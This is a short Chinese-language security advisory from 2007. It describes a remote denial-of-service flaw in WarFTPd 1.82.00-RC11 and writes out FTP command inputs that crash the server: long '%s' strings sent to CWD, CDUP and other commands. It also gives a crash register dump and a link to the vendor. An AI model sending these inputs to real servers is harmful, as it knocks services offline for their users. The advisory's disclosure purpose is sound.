WarFTPd多个命令处理远程拒绝服务漏洞
来源:岁月联盟
时间:2007-11-05
受影响系统
Jgaa WarFTPd 1.82.00-RC11
描述
BUGTRAQ ID: 20944
War FTP Daemon是32位Windows平台上的FTP服务器。
WarFTPd在处理多个命令的畸形参数时存在漏洞,远程安全者可能利用此漏洞对服务器造成拒绝服务。
如果向各种命令发送了包含有两次“%s”字符的超长字符串的话,就会导致WarFTPd拒绝服务。例如,发送以下命令:
$ ftp target(Banner)ftp> quote user anonymousftp> quote pass blaftp> cwd %s*256
或者:
ftp> cdup %s*256
就会导致服务器崩溃:
EAX 00000001ECX 00000073EDX 00000002EBX 0079E890ESP 0079E7A0EBP 00A55A8A ASCII"s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s(...more %scharacters)"ESI 0079E7DEEDI 0000000AEIP 00431540 war-ftpd.0043154000431540 8A08 MOV CL,BYTE PTR DS:[EAX]
目前已知至少以下命令受这个漏洞影响:
CWDCDUPDELENLSTLISTSIZE
建议
厂商补丁:
Jgaa
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://support.jgaa.com/index.php?MenuPage=frontpage
